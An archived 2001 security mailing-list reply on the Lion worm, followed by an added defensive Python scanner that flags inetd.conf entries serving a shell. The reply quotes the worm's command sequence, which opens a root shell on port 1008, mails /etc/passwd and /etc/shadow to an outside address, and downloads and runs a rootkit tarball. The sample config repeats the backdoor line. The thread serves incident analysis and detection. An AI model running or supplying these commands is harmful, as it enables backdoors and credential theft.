Security Incidents mailing list archives
Re: Lion Worm/crew.tgz
From: David Brumley <dbrumley () RTFM STANFORD EDU>
Date: Fri, 23 Mar 2001 13:36:50 -0800
> Neil Long <neil.long () computing-services oxford ac uk> mailed me and
> mentioned that it might be worth pointing out that the SANS GIAC analysis
> is not valid for the crew.tgz version that was sent to Incidents by
> Andreas Östling <andreaso () IT SU SE>. There is no t0rn rootkit involved
                                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> and the root shell is on 1008, so their Lionfind may be misleading. Of
> course, there could be half a dozen variants on the loose by this stage.

In February we saw the following exploit:

    PATH='/usr/bin:/bin:/usr/local/bin/:/usr/sbin/:/sbin'; export PATH;
    export TERM=vt100;
    rm -rf /dev/.lib; mkdir /dev/.lib; cd /dev/.lib;
    echo '1008 stream tcp nowait root /bin/sh sh' >>/etc/inetd.conf;
    killall -HUP inetd;
    ifconfig -a >1i0n; cat /etc/passwd >>1i0n; cat /etc/shadow >>1i0n;
    mail 1i0nip () china com <1i0n; rm -fr 1i0n; rm -fr /.bash_history;
    lynx -dump http://coollion.51.net/crew.tgz >1i0n.tgz;
    tar -zxvf 1i0n.tgz; rm -fr 1i0n.tgz;
    cd lib; ./1i0n.sh; exit;

The tar file did contain t0rn. This is why the sort of tools SANS released
are good heuristics, but not definitive. The same can be said for rootkit
scanners, IDS systems, and just about anything else. Ho hum.

-djb

--
#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#
David Brumley - Stanford Computer Security - dbrumley at Stanford.EDU
Phone: +1-650-723-2445              WWW: http://www.stanford.edu/~dbrumley
Fax: +1-650-725-9121        PGP: finger dbrumley-pgp at sunset.Stanford.EDU
#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#
Life is a whim of several billion cells to be you for a while.
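The point of the mail above is that a signature keyed to one variant (root shell on port 1008, the t0rn rootkit, the /dev/.lib directory) is only a heuristic, and the next variant moves the port or swaps the kit. A check that looks for the general pattern the exploit relies on, an inetd service whose server program is an interactive shell, on any port and behind any wrapper, is less brittle. The scanner below is an added example written for this archive page; it is not code from the thread, from SANS or from Lionfind. The inetd.conf it scans is a constructed sample: only the `1008 stream tcp nowait root /bin/sh sh` line is taken from the exploit quoted in the mail, the `31337` line is an invented variant to show the port-independent match.

```python
"""Heuristic scan of an inetd.conf for bind-shell backdoor entries.

Added example for the Lion worm thread; not code from the original mail.
The SAMPLE_INETD_CONF below is constructed: the "1008 ... /bin/sh sh" line
is the one the worm appends, the "31337" line is a hypothetical variant.
"""
import re
from typing import Dict, List

# Interactive shells: a service whose effective server is one of these is a
# bind shell no matter which port it listens on.
SHELLS = {"sh", "bash", "ash", "csh", "tcsh", "ksh", "zsh"}
# Wrappers that exec the program named in their first argument.
WRAPPERS = {"tcpd"}


def parse_inetd_conf(text: str) -> List[Dict]:
    """Parse inetd.conf lines into dicts, skipping comments and blank lines.

    Field layout: service socktype proto wait[.max] user[.group] server [args...]
    """
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 6:
            entries.append({"lineno": lineno, "malformed": True, "raw": raw})
            continue
        service, socktype, proto, wait, user = fields[:5]
        entries.append({
            "lineno": lineno,
            "service": service,
            "socktype": socktype,
            "proto": proto,
            "wait": wait.split(".")[0],
            "user": re.split(r"[.:]", user)[0],   # strip optional .group / :group
            "server": fields[5],
            "args": fields[6:],
            "malformed": False,
            "raw": raw,
        })
    return entries


def effective_program(entry: Dict) -> str:
    """Program inetd ultimately runs: look through tcpd-style wrappers."""
    prog = entry["server"]
    if prog.rsplit("/", 1)[-1] in WRAPPERS and entry["args"]:
        prog = entry["args"][0]
    return prog


def find_backdoors(text: str) -> List[Dict]:
    """Return entries whose effective server is a shell, with weaker signals attached."""
    findings = []
    for e in parse_inetd_conf(text):
        if e["malformed"]:
            continue
        reasons = []
        prog = effective_program(e)
        if prog.rsplit("/", 1)[-1] in SHELLS:
            reasons.append("server is an interactive shell")
            if e["user"] == "root":
                reasons.append("runs as root")
        # Legitimate entries name a service from /etc/services; a bare port
        # number is unusual on its own but is how the worm's line is written.
        if e["service"].isdigit():
            reasons.append("numeric service name instead of /etc/services entry")
        if reasons:
            findings.append({"lineno": e["lineno"], "service": e["service"],
                             "program": prog, "reasons": reasons})
    return findings


# Constructed sample; see module docstring.
SAMPLE_INETD_CONF = """\
# sample /etc/inetd.conf (constructed)
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
finger  stream  tcp     nowait  nobody  /usr/sbin/tcpd  in.fingerd
daytime stream  tcp     nowait  root    internal
1008 stream tcp nowait root /bin/sh sh
# hypothetical variant: different port, shell hidden behind tcpd
31337 stream tcp nowait root /usr/sbin/tcpd /bin/bash -i
"""

if __name__ == "__main__":
    for f in find_backdoors(SAMPLE_INETD_CONF):
        print(f"line {f['lineno']}: service {f['service']} -> {f['program']}: "
              + "; ".join(f["reasons"]))
```

Run it against a live box with `find_backdoors(open("/etc/inetd.conf").read())`; a clean inetd.conf yields an empty list. The numeric-service signal is reported only alongside other findings here, since a careful attacker can just as easily register a name in /etc/services, which is exactly the kind of variant drift the mail warns about.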
Current thread:
- Lion Worm/crew.tgz Alfred Huger (Mar 23)
- Re: Lion Worm/crew.tgz David Brumley (Mar 23)
- Re: Lion Worm/crew.tgz Andreas Östling (Mar 23)
- Re: Lion Worm/crew.tgz Joshua Krage (Mar 23)
- Re: Lion Worm/crew.tgz Neil Long (Mar 24)
- Re: Lion Worm/crew.tgz Michael H. Warfield (Mar 24)
- Re: Lion Worm/crew.tgz Andreas Östling (Mar 24)
- Re: Lion Worm/crew.tgz Michael H. Warfield (Mar 24)
- Re: Lion Worm/crew.tgz Dave Dittrich (Mar 26)
- Re: Lion Worm/crew.tgz Andreas Östling (Mar 24)
- Re: Lion Worm/crew.tgz John Jasen (Mar 26)
- Re: Lion Worm/crew.tgz Cooper (Mar 26)
- Re: Lion Worm/crew.tgz John Jasen (Mar 26)
- Re: Lion Worm/crew.tgz Cooper (Mar 26)